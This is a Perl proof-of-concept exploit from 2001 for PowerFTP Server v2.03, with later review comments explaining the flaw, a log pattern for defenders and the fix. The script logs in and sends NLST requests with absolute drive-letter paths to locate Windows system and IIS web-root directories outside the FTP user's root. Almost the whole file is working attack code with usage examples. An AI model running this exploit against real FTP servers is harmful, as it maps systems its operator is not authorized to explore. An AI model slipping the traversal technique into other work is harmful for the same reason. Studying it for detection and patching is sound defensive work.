#!/usr/bin/perl
# Simple script to view the files from the ftp server,
# even if they are outside of root directory.
#
# This script assume OS WinNT/2k/W.x and it looked
# for directories of IIS.
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_data.pl -s
#
# Examples:
#
# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp
# perl -x PowerFTP_data.pl -s 10.0.0.1
#
# NOTE(review): what this script demonstrates, for defenders reading it:
# after an ordinary FTP login it issues NLST requests with absolute,
# drive-letter paths ("c:/winnt/", "c:/Inetpub/wwwroot/", ...) and treats
# a 213 reply as "that directory exists". A server that confines each
# account to its own root would refuse such paths; a 213 here means the
# server is not enforcing that confinement. The same request pattern
# (NLST/LIST arguments carrying a drive letter or leaving the user's
# home directory) is what to look for in FTP server logs, and the fix is
# a vendor update or an FTP service that jails users to their home
# directory.
#
# NOTE(review): the file runs without `use strict; use warnings;` — %args,
# $host, $sock, $drive and $file are undeclared package globals. Left as
# written; documented rather than changed.
use Getopt::Std;
use IO::Socket;

print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
# -s host, -l login, -p password; all three take a value.
getopts('s:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);
$CRLF = "\015\012";                 # FTP line terminator (CR LF)
@drives = ("c","d","e"); #Possible drives remotes
# If u needed read the drive A floopy add this line
# @drives = ("a","c","d","e","f".......etc,etc
$port = 21;
$login = 'temp'; #Maybe u needed to change this
$pass = 'temp'; #Maybe u needed to change this
# A host is mandatory; login and password fall back to the defaults above.
if (defined $args{s}) { $host = $args{s}; } else { print "No host specified.\n"; print "Usage: $0 -s -l -p \n\n";exit; }
if (defined $args{l}) { $login = $args{l}; }
if (defined $args{p}) { $pass = $args{p}; }
# One control connection is used for the whole run; every probe below
# reads exactly one reply line from it.
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("Socket errors: $!");
$sock_res = <$sock>;                # banner
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
# Anything other than a 230 ("logged in") reply ends the run.
if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; }
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;                # reply is read but not used
print "Attempting to locate system files...";
# Legacy `&NAME` call syntax: both subs ignore @_ and work on the globals
# $sock, $CRLF, @drives and $sock_res instead.
$win = &OS;
$iis = &IIS;
print "done..\n\n";
close($sock);
print "Windows directory: $win\n";
print "IIS dorectory: $iis\n";
print "Try manually on FTPserver $host: dir c:/\n\n";
exit;

# Probes each drive in @drives for a Windows system directory.
# Returns "DRIVE:\DIR" for the first NLST that gets a 213 reply,
# else the string "not found".
# NOTE(review): only one reply line is read per NLST; a multi-line reply
# would leave later reads out of step with the server — not verified here.
sub OS {
    my @win_dirs = ("win","windows","winnt","winme");
    foreach $drive (@drives) {
        foreach $dir (@win_dirs) {
            print ".";                              # progress marker
            print $sock "NLST $drive:/$dir/" . $CRLF;
            $sock_res = <$sock>;
            if ($sock_res =~ /213\s/) {return("$drive:\\$dir");}
        }
    }
    return("not found");
}

# Same probe as OS() for the default IIS web-root paths.
# Returns "DRIVE:\PATH" with forward slashes converted to backslashes
# for the first NLST that gets a 213 reply, else "not found".
# Note the s/// below edits the @iis_files element in place ($file aliases
# it), which does not matter because the sub returns immediately.
sub IIS {
    my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/");
    foreach $drive (@drives) {
        foreach $file (@iis_files) {
            print ".";                              # progress marker
            print $sock "NLST $drive:/$file" . $CRLF;
            $sock_res = <$sock>;
            if ($sock_res =~ /213\s/) { $file =~ s/\//\\/g; return("$drive:\\$file"); }
        }
    }
    return("not found");
}